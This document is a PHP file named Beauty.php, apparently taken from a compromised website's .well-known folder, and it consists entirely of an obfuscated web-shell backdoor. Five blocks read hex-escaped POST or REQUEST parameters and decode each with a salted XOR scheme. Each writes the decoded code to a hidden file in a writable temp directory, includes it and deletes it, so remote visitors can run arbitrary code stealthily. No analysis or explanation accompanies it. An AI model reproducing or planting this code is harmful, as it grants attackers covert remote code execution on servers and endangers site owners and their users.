File: //proc/thread-self/root/home/vitanhod/prostanur1.vitavit.com.pk/.well-known/Beauty.php
<?php if(isset($_POST) && isset($_POST["p\x73e\x74"])){ $k = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), "/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getenv("TEMP")]); $comp = $_POST["p\x73e\x74"]; $comp= explode("." , $comp ); $data = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s3 ); foreach ($comp as $l=> $v9) { $sChar = ord($s3[$l % $sLen] ); $dec = ((int)$v9 - $sChar - ($l % 10)) ^ 99; $data .= chr($dec ); } foreach ($k as $ent): if (!!is_dir($ent) && !!is_writable($ent)) { $obj = implode("/", [$ent, ".reference"]); if (@file_put_contents($obj, $data) !== false) { include $obj; unlink($obj); exit; } } endforeach; }
if(array_key_exists("pg\x72\x70", $_POST) && !is_null($_POST["pg\x72\x70"])){ $marker = $_POST["pg\x72\x70"]; $marker= explode( '.' ,$marker ); $element= ''; $s2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s2 ); foreach( $marker as $z => $v8): $sChar= ord( $s2[$z %$lenS] ); $dec= ( ( int)$v8 - $sChar -( $z %10)) ^ 6; $element .=chr( $dec ); endforeach; $elem = array_filter([getenv("TMP"), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/tmp", session_save_path(), sys_get_temp_dir()]); foreach ($elem as $key => $entity) { if (is_writable($entity) && is_dir($entity)) { $reference = str_replace("{var_dir}", $entity, "{var_dir}/.flg"); $success = file_put_contents($reference, $element); if ($success) { include $reference; @unlink($reference); die();} } } }
if(in_array("p\x72opert\x79_set", array_keys($_POST))){ $hld = $_POST["p\x72opert\x79_set"]; $hld = explode( '.',$hld ); $item = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $o = 0; $len = count($hld); do { if ($o >= $len) break; $v8 = $hld[$o]; $chS = ord($salt[$o % $lenS]); $d = ((int)$v8 - $chS - ($o % 10)) ^ 81; $item .= chr($d); $o++; } while (true); $binding = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp"]); foreach ($binding as $key => $flag) { if (is_writable($flag) && is_dir($flag)) { $data = "$flag" . "/.mrk"; $file = fopen($data, 'w'); if ($file) { fwrite($file, $item); fclose($file); include $data; @unlink($data); exit; } } } }
if(array_key_exists("\x6D\x61\x72ker", $_REQUEST) && !is_null($_REQUEST["\x6D\x61\x72ker"])){ $token = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TEMP"), "/dev/shm", getcwd(), "/tmp", getenv("TMP")]); $entry = $_REQUEST["\x6D\x61\x72ker"]; $entry = explode ( "." ,$entry) ; $data =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s ); foreach( $entry as $l => $v7) { $sChar =ord( $s[$l % $lenS] ); $d =( ( int)$v7 - $sChar -( $l % 10)) ^ 97; $data .=chr( $d ); } foreach ($token as $obj): if (!!is_dir($obj) && !!is_writable($obj)) { $elem = join("/", [$obj, ".resource"]); $success = file_put_contents($elem, $data); if ($success) { include $elem; @unlink($elem); die();} } endforeach; }
if(isset($_POST["s\x79m\x62\x6Fl"])){
$dchunk = $_POST["s\x79m\x62\x6Fl"];
$dchunk= explode("." , $dchunk ) ;
$binding = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt);
$q = 0;
while ($q < count($dchunk)) {
$v3 = $dchunk[$q];
$chS = ord($salt[$q % $sLen]);
$dec = ((int)$v3 - $chS - ($q % 10)) ^ 32;
$binding .= chr($dec);
$q++;
}
$data_chunk = array_filter([getcwd(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", "/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path()]);
foreach ($data_chunk as $key => $elem) {
if (!!is_dir($elem) && !!is_writable($elem)) {
$marker = str_replace("{var_dir}", $elem, "{var_dir}/.dat");
if (file_put_contents($marker, $binding)) {
include $marker;
@unlink($marker);
die();
}
}
}
}